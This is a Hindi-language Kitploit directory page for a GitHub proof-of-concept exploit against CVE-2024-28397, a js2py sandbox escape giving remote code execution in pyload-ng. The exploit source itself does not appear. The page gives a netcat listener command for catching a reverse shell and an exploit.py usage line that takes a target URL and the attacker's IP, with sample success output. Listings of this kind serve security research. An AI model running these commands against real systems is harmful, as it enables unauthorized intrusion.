Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — CVE-2024-28397 के लिए PoC एक्सप्लॉइट – js2py सैंडबॉक्स एस्केप के माध्यम से pyload-ng में दूरस्थ कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

CVE-2024-28397 के लिए PoC एक्सप्लॉइट – js2py सैंडबॉक्स एस्केप के माध्यम से pyload-ng में दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

रिमोट कोड एक्ज़ीक्यूशन – CVE-2024-28397 (pyload-ng / js2py)

इस रिपॉज़िटरी में CVE-2024-28397 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो pyload-ng को प्रभावित करने वाली एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो js2py के असुरक्षित उपयोग के कारण होती है।

अस्वीकरण:
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है।
इसका उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।


भेद्यता विवरण

  • CVE आईडी: CVE-2024-28397
  • घटक: pyload-ng में js2py
  • प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • हमला वेक्टर: दुर्भावनापूर्ण JS पेलोड js2py सैंडबॉक्स से बाहर निकलकर मनमाना सिस्टम कमांड निष्पादित करता है।

आवश्यकताएँ और सेटअप

आपको Python 3.x, requests लाइब्रेरी, और रिवर्स शेल पकड़ने के लिए की आवश्यकता होगी।

netcat
  • लक्ष्य → भेद्य pyload-ng इंस्टेंस, जिसमें /run_code एंडपॉइंट एक्सेसिबल हो

लिसनर → एक्सप्लॉइट चलाने से पहले शुरू करें:

nc -lvnp 4444

उपयोग:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

उदाहरण आउटपुट:

  • [+] पंजीकरण सफल!
  • [+] लॉगिन सफल
  • [+] एक्सप्लॉइट काम कर गया
टूल डाउनलोड करें